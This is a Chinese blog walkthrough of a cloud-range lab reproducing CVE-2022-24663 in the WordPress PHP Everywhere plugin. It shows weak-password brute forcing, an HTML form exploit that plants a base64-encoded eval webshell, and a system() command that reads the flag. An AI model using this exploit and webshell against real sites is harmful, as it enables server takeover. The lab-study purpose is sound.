首页 > 其他分享 >春秋云境 CVE-2022-24663复现

春秋云境 CVE-2022-24663复现

时间:2022-11-24 12:11:19浏览次数:47  
标签:PHP 24663 代码 云境 everywhere 2022 php 任意 参数设置

靶标介绍:

远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码。P.S. 存在常见用户名低权限用户弱口令

 

 

 

 打开地址进入场景

 

 

发现是个wp的后台。链接拼接上wp-admin 进入后台

爆破得到账号密码为test test 

 

 

 

 

 

提示任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码

这里指的是任意PHP代码并且是任意位置

随便找个html页面进行exp注入

 <form
      action="http://eci-2zei2lxiq05pi7hyrjxd.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
      method="post"
    >
      <input name="action" value="parse-media-shortcode" />
      <textarea name="shortcode">
[php_everywhere]file_put_contents("/var/www/html/fuck.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4="));[/php_everywhere]</textarea
      >
      <input type="submit" value="Execute" />
    </form>

  

 

 

 

 

 

 直接提交

 

直接访问http://eci-2zei2lxiq05pi7hyrjxd.cloudeci1.ichunqiu.com/fuck.php

返回状态码为200表示成功。其他表示不行

 <form
      action="http://eci-2zei2lxiq05pi7hyrjxd.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
      method="post"
    >
      <input name="action" value="parse-media-shortcode" />
      <textarea name="shortcode">
[php_everywhere] <?php file_put_contents("/var/www/html/fuck.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=")); ?>[/php_everywhere]</textarea
      >
      <input type="submit" value="Execute" />
    </form>

可以尝试这段exp。参考大佬写法。加上了<?php ?>

 

 

 直接phpinfo();查看是否成功

 

cmd=system('tac /f*'); 搞定

 

 

 

标签:PHP,24663,代码,云境,everywhere,2022,php,任意,参数设置
From: https://www.cnblogs.com/chenrunxuan/p/16921432.html

相关文章

  • [NIPS 2022]Neural Temporal Walks Motif-Aware Representation Learning on Continuo
    NeuralTemporalWalks:Motif-AwareRepresentationLearningonContinuous-TimeDynamicGraphs介绍该文针对的是Continuous-TimeDynamicGraphs,也就是说边和点会随......
  • luogu P8500 [NOI2022] 冒泡排序
    题面传送门这个部分分提示得太妙了。首先这个冒泡排序的壳已经被套烂了,就是对逆序对计数。首先观察一下,发现第一个样例解释中在等于某个限制对应的最小值的时候取到逆序......
  • .NET周报【11月第3期 2022-11-22】
    国内文章.NETConfChina2022第一批讲师阵容大揭秘!整个期待了!https://mp.weixin.qq.com/s/4p89hhBPw6qv-0OB_T_TOg目光看过来2022年12月3-4日,一场社区性质的国内规模......
  • 「2022/11」学习记录
    「ARC090E」AvoidingCollision在一个有\(N\)个顶点和\(M\)条边的图上有两个人,分别在\(S\)号节点和\(T\)号节点。他们要各自走到对面(即在\(S\)的人走到\(T\),......
  • 【2022-11-22】世界杯节
    23:00面谀之词,有识者未必悦心;背后之议,受憾者常若刻骨。                                   ......
  • 【2022-11-23】世界杯具
    23:00能够把每一棵树、每一朵树下的小花儿都当成朋友的人,是真正快乐的人。                             ......
  • day20221124今天学会了什么?
    day20221124周四学习方法:看文献学习,阅读。看视频学习,泡进代码。学呗,不会就问。手把手教。》工作技术最重要:今天计划做什么任务?今天学会了什么?做PPT》明天学会了什么......
  • 2022丘成桐女子中学生数学竞赛试题
    对于级数\(\sum\limits_{n=1}^{+\infty}\sum\limits_{m=1}^{n}\dfrac{1}{n^{\alpha}m^{\beta}}\),求\(\alpha,\beta\)使级数收敛.给定椭圆\(C:\dfrac{x^2}{a^2}+\dfra......
  • GL-Being assertive 20221123
    Time2022.11.23Wednesday23:30-00:15TopicBeingassertivePracticegivingyouropinionsinano-nonsenseway,andseewhoisthemost'assertive'personin......
  • 2022年春秋杯春季-勇者山峰-部分WriteUp
    关注公众号看图弹钢琴得到flag2、Mercy-code<?phphighlight_file(__FILE__);if($_POST['cmd']){$cmd=$_POST['cmd'];if(';'===preg_replace('/[a-z_]+\((?......